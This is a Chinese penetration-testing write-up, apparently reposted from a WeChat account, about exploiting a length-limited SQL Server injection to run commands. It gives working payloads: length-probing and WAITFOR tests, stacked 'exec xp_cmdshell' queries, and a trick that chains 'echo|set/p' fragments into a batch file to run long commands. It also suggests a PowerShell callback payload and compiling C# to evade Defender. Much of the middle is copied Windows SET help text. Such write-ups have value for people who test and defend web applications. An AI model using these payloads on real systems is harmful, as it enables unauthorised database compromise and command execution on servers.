记一次注入限制长度时的命令执行

曾经在一次项目中，遇到一个有点意思的注入，由于年代有点久远，对方的漏洞早已修复，截图也已丢失，于是搭建了一个sql的环境，复现当时的操作，旨在抛砖引玉，各位巨佬请勿笑话。

简单介绍一下目标的情况：

1. IIS + .NET 4.0 + sqlserver 2008，站库分离。 

2. 存在POST字符型注入，存在长度限制，超过就会被截断，没有提示。

3. sqlserver权限为system。

4. 存在defender，可以执行xp_cmdshell，但是无法使用常见的certutil、bitsadmin等下载文件。

5. 目标在内网，可出网。

此文章的图片皆为数据库复现。

别的都还好，最要命的是这个长度的限制，导致很多语句都无法执行。首先必须得确定限制的字符数，可以采用以下的语句测试：

' and '1'!='12'--+' and '1'!='123'--+' and '1'!='1234'--+……

如果字符串没被截断，则返回的是正常页面：

如果返回不正常就是字数超过：

最终得出限制的字符数是50。

测试是否能多句执行：

'WAITFOR delay '00:00:10'--

因为目标代码的原因，多句执行的时候，后面的语句错误不会返回，那么可以采用下面的语句进行判断存储过程是否存在：

'exec xp_cmdshell ''WAITFOR delay'00:00:05'--

延迟5s，代表是存在的。

出现下面这种情况，没有执行waitfor语句，代表存储过程不存在或者无法执行：

必须的字符有以下几个

'exec xp_cmdshell''--

一共21个字符，也就是说我们可控的字符数是29个，由于是分句执行，无回显，普通的cmd命令无法获取结果。且目标在内网，即使可以添加用户也无法直接登录。

我们可以把需要执行的命令echo到一个bat里，再执行那个bat。由于echo在windows的有个特殊性，会自动在输出后添加换行符号，这就会导致，如果命令长度超出29，多次输入的话中间会存在一个换行符。

那么有没有办法能将指定的字符重定向到文件而不在后面添加换行符呢？答案是有的。

在此之前，我们先来看一个命令：

set

windows 10的命令简介如下：

显示、设置或删除 cmd.exe 环境变量。

SET [variable=[string]]

variable  指定环境变量名。
string    指定要指派给变量的一系列字符串。
要显示当前环境变量，键入不带参数的 SET。
如果命令扩展被启用，SET 会如下改变:
可仅用一个变量激活 SET 命令，等号或值不显示所有前缀匹配
SET 命令已使用的名称的所有变量的值。例如:

SET P

会显示所有以字母 P 打头的变量。
如果在当前环境中找不到该变量名称，SET 命令将把 ERRORLEVEL
设置成 1。
SET 命令不允许变量名含有等号。
在 SET 命令中添加了两个新命令行开关:

SET /A expressionSET /P variable=[promptString]

/A 命令行开关指定等号右边的字符串为被评估的数字表达式。该表达式
评估器很简单并以递减的优先权顺序支持下列操作:

    ()                  - 分组
    ! ~ -               - 一元运算符
    * / %               - 算数运算符
    + -                 - 算数运算符
    << >>               - 逻辑移位
    &                   - 按位“与”
    ^                   - 按位“异”
    |                   - 按位“或”
    = *= /= %= += -=    - 赋值
      &= ^= |= <<= >>=
    ,                   - 表达式分隔符

如果你使用任何逻辑或取余操作符， 你需要将表达式字符串用引号扩起来。在表达式中的任何非数字字符串键作为环境变量名称，这些环境变量名称的值已在使用前转换成数字。如果指定了一个环境变量名称，但未在当前环境中定义，那么值将被定为零。这使你可以使用环境变量值做计算而不用键入那些 % 符号来得到它们的值。如果 SET /A 在命令脚本外的命令行执行的，那么它显示该表达式的最后值。该分配的操作符在分配的操作符左边需要一个环境变量名称。除十六进制有 0x 前缀，八进制有 0 前缀的，数字值为十进位数字。因此，0x12 与 18 和 022相同。请注意八进制公式可能很容易搞混: 08 和 09 是无效的数字，因为 8 和 9 不是有效的八进制位数。(& )
/P 命令行开关允许将变量数值设成用户输入的一行输入。读取输入行之前，显示指定的 promptString。promptString 可以是空的。环境变量替换已如下增强:

%PATH:str1=str2%

会扩展 PATH 环境变量，用 "str2" 代替扩展结果中的每个 "str1"。要有效地从扩展结果中删除所有的 "str1"，"str2" 可以是空的。"str1" 可以以星号打头；在这种情况下，"str1" 会从扩展结果的开始到 str1 剩余部分第一次出现的地方，都一直保持相配。也可以为扩展名指定子字符串。

%PATH:~10,5%

会扩展 PATH 环境变量，然后只使用在扩展结果中从第 11 个(偏移量 10)字符开始的五个字符。如果没有指定长度，则采用默认值，即变量数值的余数。如果两个数字(偏移量和长度)都是负数，使用的数字则是环境变量数值长度加上指定的偏移量或长度。

%PATH:~-10%

会提取 PATH 变量的最后十个字符。

%PATH:~0,-2%

会提取 PATH 变量的所有字符，除了最后两个。

终于添加了延迟环境变量扩充的支持。该支持总是按默认值被停用，但也可以通过 CMD.EXE 的 /V 命令行开关而被启用/停用。请参阅 CMD /?

考虑到读取一行文本时所遇到的目前扩充的限制时，延迟环境变量扩充是很有用的，而不是执行的时候。以下例子说明直接变量扩充的问题:

 set VAR=before if "%VAR%" == "before" (set VAR=after if "%VAR%" == "after" @echo If you see this, it worked )

不会显示消息，因为在读到第一个 IF 语句时，BOTH IF 语句中的 %VAR% 会被代替；
原因是: 它包含 IF 的文体，IF 是一个复合语句。所以，复合语句中的 IF 实际上是在比较 "before"和"after"，这两者永远不会相等。同样，以下这个例子也不会达到预期效果:

 set LIST= for% i in (*) do set LIST=%LIST%%i echo%LIST%

 原因是，它不会在目前的目录中建立一个文件列表，而只是将LIST 变量设成找到的最后一个文件。这也是因为 %LIST% 在FOR 语句被读取时，只被扩充了一次；而且，那时的 LIST 变量是空的。因此，我们真正执行的 FOR 循环是:

for% i in (*) do set LIST= %i

这个循环继续将 LIST 设成找到的最后一个文件。

延迟环境变量扩充允许你使用一个不同的字符(惊叹号)在执行时间扩充环境变量。如果延迟的变量扩充被启用，可以将上面例子写成以下所示，以达到预期效果:

 set VAR=beforeif "%VAR%" == "before" ( set VAR=after if "!VAR!" == "after" @echo If you see this, it worked )
 set LIST= for% i in (*) do set LIST=!LIST! %i echo %LIST%

如果命令扩展被启用，有几个动态环境变量可以被扩展，但不会出现在 SET 显示的变
量列表中。每次变量数值被扩展时，这些变量数值都会被动态计算。如果用户用这些
名称中任何一个明确定义变量，那个定义会替代下面描述的动态定义:

%CD% - 扩展到当前目录字符串。

%DATE% - 用跟 DATE 命令同样的格式扩展到当前日期。

%TIME% - 用跟 TIME 命令同样的格式扩展到当前时间。

%RANDOM% - 扩展到 0 和 32767 之间的任意十进制数字。

%ERRORLEVEL% - 扩展到当前 ERRORLEVEL 数值。

%CMDEXTVERSION% - 扩展到当前命令处理器扩展版本号。

%CMDCMDLINE% - 扩展到调用命令处理器的原始命令行。

%HIGHESTNUMANODENUMBER% - 扩展到此计算机上的最高 NUMA 节点号。

注意 /p 这个参数，假设我们输入的命令为：

set /p a=b

在这句命令里，a是被赋值的变量名，b是提示内容，输入命令后，系统会接收我们的输入，以回车结束，将字符串赋值给a。

这里面的a、b都可以为空白。如果我们把a设置成空白，通过管道把回车输入给它，再重定向到文件，是不是只剩下b的值了？

这里还有一个小技巧，由于单引号和双引号在导出的文件中经常会遇到，所以可以采用"exec xp_cmdshell [ 命令 ]"这种形式，不必考虑单双引号的问题。

接下来我们要把下面的语句写入一个文件，再改名为bat：

cmd /c whoami && ipconfig && ver && net user && systeminfo

这里只是一段测试语句，你可以换成任何语句，比如powershell上线。

测试语句如下：

'exec xp_cmdshell[echo|set/p="cmd /c whoa">d:w]--'exec xp_cmdshell[echo|set/p="mi && ipco">>d:w]--'exec xp_cmdshell[echo|set/p="nfig && ve">>d:w]--'exec xp_cmdshell[echo|set/p="r && net u">>d:w]--'exec xp_cmdshell[echo|set/p="ser && sys">>d:w]--'exec xp_cmdshell[echo|set/p="teminfo">>d:w]--

执行结果：

可以看到文件成功写入，且符合我们预期：

接着改名：

执行：

至此，成功在限制字符数的条件下执行了长命令。

由于常见的远程下载方式都被defender拦截，powershell上线的话更难，在这里推荐使用csc.exe编译一个c#代码进行远程文件下载。这种方式在之前的文章<记一次艰难的文件上传>里面有过介绍，这里不再赘述。

原文始发于微信公众号（黑白之道）：记一次注入限制长度时的命令执行